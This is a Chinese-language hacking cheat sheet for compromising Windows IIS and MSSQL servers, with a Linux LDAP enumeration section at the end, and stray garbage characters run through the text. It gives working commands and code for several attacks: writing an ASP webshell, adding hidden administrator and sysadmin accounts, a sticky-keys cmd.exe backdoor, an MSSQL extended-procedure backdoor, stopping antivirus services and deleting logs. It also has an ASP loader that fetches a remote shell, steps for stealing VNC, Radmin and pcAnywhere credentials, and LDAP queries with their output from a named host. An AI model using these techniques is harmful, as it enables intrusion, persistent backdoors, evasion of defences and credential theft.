旁站路径问题 R) J* Y' K6 b+ z: t7 [' N) G
1、读网站配置。
( K1 n$ d; V) Y2 e5 e/ _2、用以下VBS
) s0 z" Q! ?. ^6 ZOn Error Resume Next
4 ]- e3 G3 b: r$ dIf (LCase(Right(WScript.Fullname,11))="wscript.exe") Then
6 ]2 e! Q" ?" F3 n1 S7 s" t, l 5 Z6 Z/ b# o" G! o# w% H+ G
( a3 F4 P' k Z8 @9 S8 XMsgbox Space(12) & "IIS Virtual Web Viewer" & Space(12) & Chr(13) & Space(9) & "
! Z3 I& d5 n, s4 i: w" R! g* q f! N! ~! U6 `' [- }
Usage:Cscript vWeb.vbs",4096,"Lilo"7 v' n! D% D& a0 _& I- P
WScript.Quit) m5 ^4 |6 }+ q T* g" W* Q7 e
End If9 n& F- h% A1 ]% n% e2 _
Set ObjService=GetObject
: s: ~$ U; E' y5 h* |. G5 u9 o
7 s: A- e7 D3 q/ G- Y* k("IIS://LocalHost/W3SVC")5 |; @3 k- a5 L% s0 R
For Each obj3w In objservice
! q- f9 N+ v9 I9 v7 H If IsNumeric(obj3w.Name)
$ a9 ^8 {" j5 K- L0 L
- J( ~3 _/ |& ?& Y, _2 D3 HThen
1 m" L! {& ?: u$ N Set OService=GetObject("IIS://LocalHost/W3SVC/" & obj3w.Name). y+ j' P$ e/ E* b8 P+ I
& I# @8 C! M6 `8 z5 Y2 ]
5 m% C0 ^/ N0 u' A r: A2 A
Set VDirObj = OService.GetObject("IIsWebVirtualDir", "ROOT"); D$ D0 M6 m7 Z7 I7 {% w
If Err & Z% g: Z" m" g( U
+ J9 d1 M8 x! s2 a/ j<> 0 Then WScript.Quit (1). T$ U% U) W* l6 m+ P/ W! q5 j
WScript.Echo Chr(10) & "[" & 0 J2 K0 Y( u4 Z& I: K6 n& t' D
/ X, w ^6 \5 u! V \/ w( K
OService.ServerComment & "]"
9 R" `2 x& J/ D5 r For Each Binds In OService.ServerBindings
" D& d& \% y: O, G% _9 M
0 @+ G: Z- k( N4 d+ J7 p! W" `" L6 r6 D
Web = "{ " & Replace(Binds,":"," } { ") & " }"9 o! N- Y" S9 ^- V, @* c
1 {. ?9 S3 S0 e
! R! ]+ N h3 H9 [5 k2 ~% E4 ~WScript.Echo Replace(Split(Replace(Web," ",""),"}{")(2),"}","")
( U; ~% d5 u3 @* z* r1 E; O* o) x, ] Next
- X( ]7 w* R% S' g. D ! ]2 N) z% L& P! ~. ^
' O ?1 b9 r \. d }
WScript.Echo " ath : " & VDirObj.Path" p6 C, D1 A T* L5 ?. _, \+ f
End If3 \, y" H' \. k5 ^& ^6 M
Next
5 d# P% {4 j1 J5 d1 U) y复制代码
& Y2 [/ a }' }; B" R) u8 G# u9 f0 U3、iis_spy列举(注:需要支持ASPX,反IISSPY的方法:将activeds.dll,activeds.tlb降权)
7 q' I9 Y1 Y# z3 ~1 [7 H" z$ ~4、得到目标站目录,不能直接跨的。通过echo ^<%execute(request("cmd"))%^> >>X:\目标目录\X.asp 或者copy 脚本文件 X:\目标目录\X.asp 像目标目录写入webshell。或者还可以试试type命令.0 x* ]# n5 s' {1 B8 {
—————————————————————
# A# X! G p. r% G1 g& }: bWordPress的平台,爆绝对路径的方法是:4 o' D; c1 l! N+ _ x" j
url/wp-content/plugins/akismet/akismet.php
' j% R: q0 y* V! Qurl/wp-content/plugins/akismet/hello.php# r2 T$ n; w: {2 r) [
——————————————————————
8 i: M! E7 I! n# }phpMyAdmin暴路径办法:* s2 P" u+ E5 ?# r6 R/ i
phpMyAdmin/libraries/select_lang.lib.php7 V5 A c, ?' Q
phpMyAdmin/darkblue_orange/layout.inc.php4 g2 Q- ?8 B ?1 b9 o9 h( h
phpMyAdmin/index.php?lang[]=1
5 ?# {7 y' D* W2 V& _) uphpmyadmin/themes/darkblue_orange/layout.inc.php
5 D/ k* O; J2 ^, D————————————————————8 c7 D+ e1 m8 V7 v
网站可能目录(注:一般是虚拟主机类)
* {& B) A/ J5 D1 p! |data/htdocs.网站/网站/
: R! Q! w/ q" p6 L————————————————————
1 q1 r0 h$ N) G' s$ HCMD下操作VPN相关' I! q, `8 q. D
netsh ras set user administrator permit #允许administrator拨入该VPN5 U J" I9 L7 B7 c$ I" k
netsh ras set user administrator deny #禁止administrator拨入该VPN4 X6 d, u J/ `' M" B
netsh ras show user #查看哪些用户可以拨入VPN
5 l+ G- j S0 Mnetsh ras ip show config #查看VPN分配IP的方式
! u9 k4 t; u8 enetsh ras ip set addrassign method = pool #使用地址池的方式分配IP/ j9 `# j6 `$ |9 B% J: K3 v( x5 Z1 p
netsh ras ip add range from = 192.168.3.1 to = 192.168.3.254 #地址池的范围是从192.168.3.1到192.168.3.254
1 u3 `/ ^& a E9 w————————————————————; ?" ]) j9 o( \+ E- j8 N7 ~" K
命令行下添加SQL用户的方法0 H4 T% s0 Y4 Y$ ]! U1 `
需要有管理员权限,在命令下先建立一个c:\test.qry文件,内容如下:8 [6 D5 x* W! x$ I
exec master.dbo.sp_addlogin test,123
& Z v$ {7 @. c7 y4 cEXEC sp_addsrvrolemember 'test, 'sysadmin'+ `6 T+ T$ B% w$ N6 p. y( [0 o
然后在DOS下执行:cmd.exe /c isql -E /U alma /P /i c:\test.qry o% y4 K C! Q. y
' w8 m% _1 p1 X9 \1 G; }另类的加用户方法
4 @9 u- u3 n8 g( }在删掉了net.exe和不用adsi之外,新的加用户的方法。代码如下:
( o! b' X( R" o6 m+ Y1 ]6 ljs:
) J1 Y5 J; X1 a) \* U) |var o=new ActiveXObject( "Shell.Users" );) M; w) Z# ~' Q; P5 V
z=o.create("test") ;5 u. a+ I0 ]6 J% O/ z
z.changePassword("123456","")
" y# `) g, ^/ V/ Z: p, S7 D7 iz.setting("AccountType")=3;7 V0 x D/ F' Z2 v5 h# `0 O
( I! y' d/ T) P/ k2 s
vbs:& D. p. |" {, ]$ A3 G
Set o=CreateObject( "Shell.Users" )! \$ U. F: y+ u1 M# P4 Z G/ W2 U4 e
Set z=o.create("test")
+ ^6 ?5 Z" X& y% Y- o9 t9 ]5 Dz.changePassword "123456",""! Z" e. P; q/ T0 i3 f, O1 [4 D
z.setting("AccountType")=3
2 I) j% h- Z# H' o# s' [! I——————————————————
9 e/ C& p0 D$ o6 K. kcmd访问控制权限控制(注:反everyone不可读,工具-文件夹选项-使用简单的共享去掉即可)
% s; Q7 Y a8 q" L$ u2 @9 N0 X7 J% Q0 ]/ x
命令如下; n3 t6 X. B5 l4 G% B5 X$ w
cacls c: /e /t /g everyone:F #c盘everyone权限% l. l, q& B+ J( n
cacls "目录" /d everyone #everyone不可读,包括admin( m6 _# _, I% E6 d( M: ?7 h8 t0 V% q
————————以下配合PR更好————& C: t/ T, ?5 F5 @6 [, m0 `
3389相关
t5 _, B, j& }! S* M& G7 n5 ra、防火墙TCP/IP筛选.(关闭net stop policyagent & net stop sharedaccess)
. K$ `& `' H+ w, f$ s8 P& qb、内网环境(LCX)% e/ T2 V: i) q0 H. R9 s2 ^. q- X8 S
c、终端服务器超出了最大允许连接
- h0 z/ a' n6 f9 AXP 运行mstsc /admin0 |% E% b: [" w& ~) s0 K
2003 运行mstsc /console
b- V* v$ @$ ?2 s% Y! F# h4 }. O3 _* k6 {0 t3 h
杀软关闭(把杀软所在的文件的所有权限去掉)
4 N1 R' |+ N. y9 y处理变态诺顿企业版:$ \& {9 k8 m4 w! a9 J- C
net stop "Symantec AntiVirus" /y
4 M: x0 e. O& O+ W; C6 Znet stop "Symantec AntiVirus Definition Watcher" /y$ X# ^6 X, V( u+ W, s
net stop "Symantec Event Manager" /y. o1 u# D. O! G3 p. Z2 o P
net stop "System Event Notification" /y
. Y2 I& ~7 a6 Y1 A- nnet stop "Symantec Settings Manager" /y
1 Z6 ~8 v# G% t# L
) Q4 j" U) P7 c卖咖啡:net stop "McAfee McShield" 1 ^5 q1 t6 {& x P! ?9 E7 r) u
————————————————————
! X5 r1 p/ b) c- ~( Q& s/ p
+ `9 p4 Z* ]- C, A% W) J c5次SHIFT:! S# P1 i% h4 a& D! s
copy %systemroot%\system32\sethc.exe %systemroot%\system32\dllcache\sethc1.exe
+ c" R) c. g8 ~: j" Q% }) ^copy %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe /y
' y( \6 g3 p) |( d+ {: F" i4 zcopy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe /y
7 j- v |, }; @* H7 p" t——————————————————————
# B8 v7 \; o/ o. r隐藏账号添加:8 q# t2 { g7 s3 ] E4 j! r
1、net user admin$ 123456 /add&net localgroup administrators admin$ /add# Q# }& n; {" c T8 K
2、导出注册表SAM下用户的两个键值
! ~: H1 x' z9 H; L/ q* O7 s# S3、在用户管理界面里的admin$删除,然后把备份的注册表导回去。
% C! v# I% `- }" K4、利用Hacker Defender把相关用户注册表隐藏
6 i% q! [% y" o' E- _2 B7 t. [——————————————————————& Q: M) P' n/ S- w
MSSQL扩展后门:( ~$ Z) k: _+ b6 y" N% v( q4 y3 t
USE master;
/ a, y5 y' L4 f" j, b, U' tEXEC sp_addextendedproc 'xp_helpsystem', 'xp_helpsystem.dll';
1 }3 s$ z+ M$ q6 RGRANT exec On xp_helpsystem TO public;
* l# J+ x& D" L' ]0 Y% j———————————————————————, V7 {7 S/ v' Q$ J! G/ K4 d5 X
日志处理: @' ]7 r$ X' I8 i2 \8 q+ e
C:\WINNT\system32\LogFiles\MSFTPSVC1>下有% o' D$ g& E" ]6 I2 K+ O
ex011120.log / ex011121.log / ex011124.log三个文件,
: c) P0 s; u7 }直接删除 ex0111124.log7 q, `: \- b6 t
不成功,“原文件...正在使用”7 q& T/ o% s' M$ ?6 R
当然可以直接删除ex011120.log / ex011121.log
6 ` H4 s9 i; M& ?/ r! I& q用记事本打开ex0111124.log,删除里面的一些内容后,保存,覆盖退出,成功。( U; w; D8 P( U5 r. X; } \) J
当停止msftpsvc服务后可直接删除ex011124.log' {- Q7 b8 k- ^& ~( e
[6 @6 U+ c! F. nMSSQL查询分析器连接记录清除:3 l" C7 @2 g4 n1 [
MSSQL 2000位于注册表如下:6 E* O" {% R' P) d! v% F3 \7 b
HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers
: \4 K$ J5 T* X( C9 j8 e( @找到接接过的信息删除。# [: c3 I. m' T
MSSQL 2005是在C:\Documents and Settings\<user>\Application Data\Microsoft\Microsoft SQL
* e' h1 q% r D! X+ L
* q7 o# O' X* f" `% \6 jServer\90\Tools\Shell\mru.dat9 P0 a. `3 q, J$ J& ~ ~0 D! I
—————————————————————————
' A ?9 P: J# \% A! l' m防BT系统拦截可使用远程下载shell,也达到了隐藏自身的效果,也可以做为超隐蔽的后门,神马的免杀webshell,用服务器安全工具一扫通通挂掉了)
8 }* k( R5 a+ l; F5 }& J3 B6 `2 u/ ^
" q; v3 j D5 g+ \7 J9 p<%% N6 \ G% m$ m9 v, J
Sub eWebEditor_SaveRemoteFile(s_LocalFileName,s_RemoteFileUrl)
. D1 M6 G) V2 R9 I6 N% b* t8 bDim Ads, Retrieval, GetRemoteData. [# k+ W ]0 x9 Y
On Error Resume Next
, r8 S0 s1 Q) Z5 k0 d2 S4 Z9 tSet Retrieval = Server.CreateObject("Microsoft.XMLHTTP")9 j( C$ g% r5 k, z2 O# B; j+ o2 }+ t
With Retrieval1 u2 g% [- i" N
.Open "Get", s_RemoteFileUrl, False, "", ""; b/ t% _) r0 k/ I. I7 d& s [* j
.Send6 y( l; L! b$ ]# T6 u
GetRemoteData = .ResponseBody- \! p0 o0 \6 |' J
End With
2 J3 A/ ^# [& RSet Retrieval = Nothing$ X5 y* q) K' V( s) `
Set Ads = Server.CreateObject("Adodb.Stream")
}! |+ M, q8 UWith Ads
1 |/ X R, c1 e4 G6 S/ l.Type = 1
3 {( B8 m/ c( H$ R* j+ p( H.Open# h5 ^) d' I% x* k5 @& v- j/ F2 ]
.Write GetRemoteData& Y) F; O% \# M2 ]; j7 D, ]
.SaveToFile Server.MapPath(s_LocalFileName), 2+ U; [- Y2 n) l' g3 C; W3 z& I
.Cancel()7 P- a* D/ {# Z
.Close()( y. P- T' q" M7 m, S! V
End With
) ]' p6 F) H! O& M& _5 R0 _: A: dSet Ads=nothing
5 @. \1 o9 O% p# S3 O8 ^( wEnd Sub% C- I% c) s: h- M4 l- A8 n% k
; A8 |+ w7 D" I/ o
eWebEditor_SaveRemoteFile"your shell's name","your shell'urL"
& L+ E+ f& B; x! A! s- o%>
# k1 w, [( k l2 [7 N
7 b6 m2 c% u5 G) S6 ?( AVNC提权方法:: ~7 e& w" g, j5 R" N6 o" H
利用shell读取vnc保存在注册表中的密文,使用工具VNC4X破解
9 J! ?3 V0 O X0 o. a, c- {注册表位置:HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\password& ?( I9 Q. A1 @" g* k ]
regedit -e c:\reg.dll "HKEY_LOCAL_MACHINE\SOFTWARE\ORL"
0 o" i# w) n5 ]" G: v0 Hregedit -e c:\reg.dll "HKEY_LOCAL_MACHINE\Software\RealVNC\WinVNC4"+ }7 p9 s u. k& \& \
Radmin 默认端口是4899,4 l% O* p0 B% b) y; l8 O( n4 d' v) k! f
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter//默认密码注册表位置: @6 v5 t' \ a
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Port //默认端口注册表位置
: ]- O- T/ m& T$ @" T( s然后用HASH版连接。
+ l. s$ o" G5 ^% @0 n如果我们拿到一台主机的WEBSEHLL。通过查找发现其上安装有PCANYWHERE 同时保存密码文件的目录是允许我们的IUSER权限访问,我们可以下载这个CIF文件到本地破解,再通过PCANYWHERE从本机登陆服务器。; T7 E5 H# i! V3 R9 N
保存密码的CIF文件,不是位于PCANYWHERE的安装目录,而且位于安装PCANYWHERE所安装盘的\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 如果PCANYWHERE安装在D:\program\文件下下,那么PCANYWHERE的密码文件就保存在D:\Documents and Settings\All
) E6 \4 X6 C0 l, w U9 R' b- h3 ]& \Users\Application Data\Symantec\pcAnywhere\文件夹下。+ E, v: ^ t! E e* S# D& h
——————————————————————
3 X4 `5 {+ g, r搜狗输入法的PinyinUp.exe是可读可写的直接替换即可
?2 r: t, ^5 J——————————————————----------
( ~5 L, z9 R' T9 GWinWebMail目录下的web必须设置everyone权限可读可写,在开始程序里,找到WinWebMail快捷方式下下
4 H& _, \1 A) _$ y/ e Z来,看路径,访问 路径\web传shell,访问shell后,权限是system,放远控进启动项,等待下次重启。
0 D ?0 V8 L6 ~. Q没有删cmd组建的直接加用户。
% K O( f! P4 Z! m) n3 B7i24的web目录也是可写,权限为administrator。. L3 o, Z4 s1 n2 r# M
# m# f4 c% a, U% I
1433 SA点构建注入点。
U' L/ C: Z. J8 N1 N<%- q" K6 |. @! F+ ?
strSQLServerName = "服务器ip"7 U8 D2 [& J" z
strSQLDBUserName = "数据库帐号"
1 a+ \. Z, g+ G. ]5 R ostrSQLDBPassword = "数据库密码"
4 j8 [9 I. h; P4 E* s" JstrSQLDBName = "数据库名称"
4 W, H9 _3 M" x% s% }, L/ m4 gSet conn = Server.createObject("ADODB.Connection")
4 C0 n/ ^) b% S' `, AstrCon = " rovider=SQLOLEDB.1 ersist Security Info=False;Server=" & strSQLServerName & , J2 C, [( {1 G1 b/ p
' O( c- a* d" V/ [; g& v+ F";User ID=" & strSQLDBUserName & " assword=" & strSQLDBPassword & ";Database=" &
! f% _* c$ }4 E1 G2 a" a: E1 A8 N3 P5 u
strSQLDBName & ";"
6 G) V; v: j" e8 r, J* [0 _1 o# X0 R- ^conn.open strCon
5 k3 ?! o( J i. U& Z2 W# a2 rdim rs,strSQL,id
, Z$ j7 ]/ J# A& G& K7 m$ Oset rs=server.createobject("ADODB.recordset")
- L' b* O# @/ H- D7 hid = request("id")0 o1 c; i$ w4 t2 I
strSQL = "select * from ACTLIST where worldid=" & idrs.open strSQL,conn,1,3
: ?0 [" [6 l! V; j: _( [" d. x9 Rrs.close9 V6 c2 J2 G/ c" F- H, {0 M+ w5 e
%>
4 q# K# G' \; [) i" s! S' b- g' `) T复制代码" ]4 c( Q# A; p1 \
******liunx 相关******# F- h0 l. }9 \* @0 U. ^0 C% q+ j1 U6 M
一.ldap渗透技巧
4 _5 I- }$ R2 I" U* W1.cat /etc/nsswitch
2 d% Y; _1 N7 D看看密码登录策略我们可以看到使用了file ldap模式2 t, Z2 U0 t3 u' P3 d( h ?
5 G. Y0 z! x1 X: ^* g& e0 }2.less /etc/ldap.conf
i5 Q) q3 u# H: Q: ^base ou=People,dc=unix-center,dc=net
w* w9 w+ n- G# t* ]' j) F* s找到ou,dc,dc设置* {2 j& f* I- D" P9 z- E
2 E* c8 y9 }/ p9 E* G+ G3 g2 F6 N) V- T
3.查找管理员信息/ |4 t7 B1 r6 w7 X( u
匿名方式
* F, B, X" P9 q8 ]. b( Bldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b
7 m2 S9 m- G" g8 u
S* l* u z% m# i/ g) V$ D"cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2
7 V# U; t) K* t1 N有密码形式) U, s8 B4 ~+ i% u3 Q& u* R- `' y
ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b * W* b. ?+ g v% X: ]- H# L: W- s0 @
' [& ?+ s7 Q$ u* O) z% a
"cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.29 H. M. Z A' f7 a( s! f7 K
! R5 @1 N2 \2 B9 i& G2 Q: e- E
2 Q A( a. p& z6 y6 f1 N1 i4.查找10条用户记录 K& G# m6 K1 Q: y( g
ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口
$ E6 ]! X$ E4 R# {3 J$ j- D3 ~8 N# w( u3 E l+ p( i# i v( d, J5 b
实战:
, t1 ^# a, C; V- S/ j5 z1.cat /etc/nsswitch
& s0 H- {# k& z看看密码登录策略我们可以看到使用了file ldap模式
: V, | d( h. |; Y ~3 u9 p0 j# d* u# | M7 Y9 Z1 T
2.less /etc/ldap.conf5 W+ R: J; m( z, n1 M9 m( S
base ou=People,dc=unix-center,dc=net: e: n" ^6 B% c9 |$ R, ?1 n
找到ou,dc,dc设置
2 q% c v4 A0 v2 _% j* i/ \2 `' @3 T* R2 a
3.查找管理员信息
9 [0 N* g( M- x% B5 v* a* b: C J匿名方式
$ i2 q4 a2 l) u$ f+ ~ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b
# i8 g/ w* J! U H; X8 B
% N" g9 ^) ^( u/ H, Y* c& b N"cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2
1 p, V0 b) q+ L& j/ a5 S9 o有密码形式8 Q7 V% c- f% ^4 e6 N( W
ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b 3 v" t! k6 Y) R& b8 i% A
. P) r2 Z! X0 L( L# n6 n"cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.20 J3 R4 I! c6 P/ I
7 w! K* }2 {$ ^' {# ]% [. m( B% _+ |
' w$ k0 B5 ]% H9 ^- }% Q& O
4.查找10条用户记录
& {8 O+ F- Q0 L) d5 X! wldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口7 L4 n c0 @! ^8 z
1 l: J# n6 X: B7 K" I. s6 w渗透实战:* W4 s0 v$ j" h; j' {% S
1.返回所有的属性
! i. _6 m5 h0 ildapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s sub "objectclass=*"! q% ?7 T2 t/ c7 z4 N0 T
version: 1+ {4 K: R0 j2 x1 H" ^* O! `
dn: dc=ruc,dc=edu,dc=cn
8 H1 U8 v0 T) R+ `* K8 Jdc: ruc
" X% }+ X, y; T/ V" xobjectClass: domain
% ^. G! g6 e% A* A5 T6 z. `9 ]. q2 E+ }
dn: uid=manager,dc=ruc,dc=edu,dc=cn
# T9 Z6 x( ?7 d. L9 d H( x' yuid: manager
( f5 X; ^9 D. O1 n9 n3 qobjectClass: inetOrgPerson( W# k; k p2 N1 h% v
objectClass: organizationalPerson
1 C- I$ n. \6 U" t `2 ^objectClass: person' Q- S( W: i" F3 C# [! Z
objectClass: top
6 N- x: w. X! l/ f1 z. e5 e) Ysn: manager( g& W5 o! `" V8 ? F1 w
cn: manager
, X7 E$ [- i% C4 B9 B" [. M
2 c$ k$ W0 L/ L* Ddn: uid=superadmin,dc=ruc,dc=edu,dc=cn
5 h$ ?- z. I, t! k( Yuid: superadmin
! s$ k( D& W1 f- k3 g+ D$ o% ]5 NobjectClass: inetOrgPerson( j, j8 W! i, s& \0 H: `" J6 h
objectClass: organizationalPerson
9 T0 w3 ~$ P5 T2 D- Z1 ZobjectClass: person5 u/ Q, U( B, D! z: a S
objectClass: top/ t- D; M; n* a+ E: ]
sn: superadmin
- U+ k* x% w$ C. {, F3 Jcn: superadmin
8 H9 l) e4 j$ ^& m
9 b' K5 M j: t: r) `+ e, Ddn: uid=admin,dc=ruc,dc=edu,dc=cn
5 D% X/ |' |& s4 S9 b0 d* fuid: admin9 x! U: A2 N: |, q/ D7 z& e
objectClass: inetOrgPerson p* F& y5 `! }1 P! x. B
objectClass: organizationalPerson
' l/ C2 n3 i% |7 R$ b" c; }objectClass: person+ a9 j$ m7 |7 e8 w
objectClass: top- p1 s3 i3 T$ A' U9 f1 V
sn: admin% O( H/ l. b' v% m
cn: admin. i' _( G# ^% b+ t X
, X9 u/ g4 O5 q# y- X, H8 s
dn: uid=dcp_anonymous,dc=ruc,dc=edu,dc=cn$ t+ G6 t3 F: @2 N1 R
uid: dcp_anonymous% W1 J4 h3 b1 R) q3 @% r: v
objectClass: top
: _, k" t/ }4 O$ C+ tobjectClass: person
' L% `# r2 e& L" e/ L* @objectClass: organizationalPerson
* ^# c9 F1 g) ^3 ?8 v. SobjectClass: inetOrgPerson, E2 U6 d/ ~! Z( j5 p- K
sn: dcp_anonymous
, V3 A7 t9 f7 W. o8 O5 dcn: dcp_anonymous
) e* r9 f* z% C5 G+ Z! O2 Z$ ]3 N2 b1 X/ @* C; f. }
2.查看基类
7 A. C: O+ H/ b1 {bash-3.00# ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s base "objectclass=*" | ; V( C2 s8 a3 k. q. k P" A7 T
1 v; {# ^& A, w' t% V, U, {more
4 r. ^* }! |1 z9 B* C, Vversion: 1% j$ d3 v+ M. D6 e2 k9 e1 L, k
dn: dc=ruc,dc=edu,dc=cn
2 `2 \* u% p( M, L1 cdc: ruc( j7 o6 L% U4 B+ ~8 e
objectClass: domain) D( E! T% r s5 o7 t+ y/ `0 ]& ^! L
. B- D7 m3 G S ?; K0 [; o
3.查找
" \) k# s; H6 z( V2 Hbash-3.00# ldapsearch -h 192.168.7.33 -b "" -s base "objectclass=*"" N0 d: |/ P1 a# `
version: 1
3 K9 R/ I% O' x6 D) Bdn:2 h* V$ M V0 B7 }; q2 O. ^( L
objectClass: top
2 \& `# c" n! `$ k% knamingContexts: dc=ruc,dc=edu,dc=cn/ v, Z+ S/ }" l
supportedExtension: 2.16.840.1.113730.3.5.7
! Y1 {$ L7 C- k5 \6 osupportedExtension: 2.16.840.1.113730.3.5.8! H4 u; T) ]) m4 M f
supportedExtension: 1.3.6.1.4.1.4203.1.11.1
) R# u9 [, M1 `, jsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.25
; H. q2 V$ L# N$ d9 p1 \supportedExtension: 2.16.840.1.113730.3.5.3: I) j0 n! N7 W
supportedExtension: 2.16.840.1.113730.3.5.5
1 d2 }! [) F4 qsupportedExtension: 2.16.840.1.113730.3.5.6; D( N, `0 [' D- P: @) Z8 I
supportedExtension: 2.16.840.1.113730.3.5.49 K t% J$ Q" V1 ^: f. z0 F: F9 W
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.1
; ~; }/ I- _8 {' O, E# ?( CsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.22 S, Q* j$ x- V% M; ?
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.3/ v; F+ z; x$ ]1 Q2 N; s0 d
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.4
0 ]" J8 N% ~, | c- j1 L; MsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.57 Y6 ]: Z! Z3 h1 c( S/ m
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.6: P* ^+ I3 c$ r" {, }8 N
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.7' V0 n6 K6 W/ u3 R
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.8
( X- j5 e( }# ?8 k' |- ^' Y- HsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.9
+ i1 R% j5 }4 I6 lsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.23
0 M; X6 @6 K6 x; z; ?. LsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.11
5 k8 O3 |' f$ Y' vsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.12
3 u& y% R0 v$ S3 h4 IsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.13
& A# N, q2 o4 `! o/ q7 osupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.14
. D& [2 y+ ^4 |& u3 w! S9 g/ {supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.15# X5 Q# c! w @- `/ @6 K" w) f$ i a, a
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.16- Z; H6 a E: E3 m) m
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.17
4 L7 B+ C, R: m$ P3 d( ]5 u9 e! QsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.18
2 j, R4 w" E: }" q4 d) n$ LsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.19
. g& c) W6 i+ zsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.21! b# A$ n+ x2 Y, {. F
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.22- {; x& {. {7 v
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.242 ?5 Z8 e6 E, U5 C( J
supportedExtension: 1.3.6.1.4.1.1466.20037
/ C+ D7 ~! o, I. k* r( |8 A1 w9 XsupportedExtension: 1.3.6.1.4.1.4203.1.11.3
# r9 t$ @4 G0 F1 n7 nsupportedControl: 2.16.840.1.113730.3.4.2
. f3 H: S2 { S- ^supportedControl: 2.16.840.1.113730.3.4.3) j3 j" g' F0 I1 _" q* ~' y
supportedControl: 2.16.840.1.113730.3.4.43 O, a$ q% D1 }
supportedControl: 2.16.840.1.113730.3.4.5
1 y0 w: j% P, K( \% r3 \supportedControl: 1.2.840.113556.1.4.473 s D! ^, V2 x2 D- B6 j
supportedControl: 2.16.840.1.113730.3.4.97 f1 u2 [6 o8 a3 t+ I. X2 A
supportedControl: 2.16.840.1.113730.3.4.16; q5 O& @ J, L, p" i/ H' i
supportedControl: 2.16.840.1.113730.3.4.15
$ U/ B2 W4 ~. u+ d8 D( usupportedControl: 2.16.840.1.113730.3.4.17
! {) E1 j' f$ O7 r' C$ P. IsupportedControl: 2.16.840.1.113730.3.4.19% M& n$ ^( I6 h6 l7 r# ^; R
supportedControl: 1.3.6.1.4.1.42.2.27.9.5.2
, |, s+ p+ }) P* e0 @supportedControl: 1.3.6.1.4.1.42.2.27.9.5.6
; k" U6 F. v0 Z7 V4 ]3 M2 _, E8 HsupportedControl: 1.3.6.1.4.1.42.2.27.9.5.8! J3 G: W" I% o; G9 M& w9 d
supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1
5 k# m* J, Q# \supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1
' D0 I( I; ^- T: ?! Y& [& `supportedControl: 2.16.840.1.113730.3.4.147 W2 V) `% c4 U
supportedControl: 1.3.6.1.4.1.1466.29539.12* ?+ c' I/ M( }2 ?* ?
supportedControl: 2.16.840.1.113730.3.4.12
. R$ ^2 @; a8 U5 l% RsupportedControl: 2.16.840.1.113730.3.4.182 y* c) R6 ^/ a, C
supportedControl: 2.16.840.1.113730.3.4.13' K: x6 d. U6 s6 [" B# a9 Y2 |
supportedSASLMechanisms: EXTERNAL/ v; o4 Y d% w; i
supportedSASLMechanisms: DIGEST-MD5: w: a# ?4 ~( V' _( Z2 N2 J. h
supportedLDAPVersion: 2
- ~, s4 g, a/ x$ m3 ksupportedLDAPVersion: 3
0 g/ ?/ _" F- d2 f( Z. cvendorName: Sun Microsystems, Inc.
- s4 o6 y% `# V4 G3 h* F6 \vendorVersion: Sun-Java(tm)-System-Directory/6.2: u( ^6 {! A2 i S9 O
dataversion: 020090516011411
! t% x2 d* k& X7 D" Unetscapemdsuffix: cn=ldap://dc=webA:389% a# M9 W& c2 H& D/ U
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA1 [' |& C6 n9 L9 H
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA8 Y/ F- }; ~7 G; q7 z
supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_256_CBC_SHA
3 ?4 `7 ]; q" C# UsupportedSSLCiphers: TLS_DHE_DSS_WITH_AES_256_CBC_SHA& Z, G \( l3 I/ I+ M$ \# J) D. i) u
supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_256_CBC_SHA
" B! m9 n* Z) T0 Q8 J0 R3 `supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA
7 L7 F! {( ~8 a) z: `2 G- SsupportedSSLCiphers: TLS_RSA_WITH_AES_256_CBC_SHA
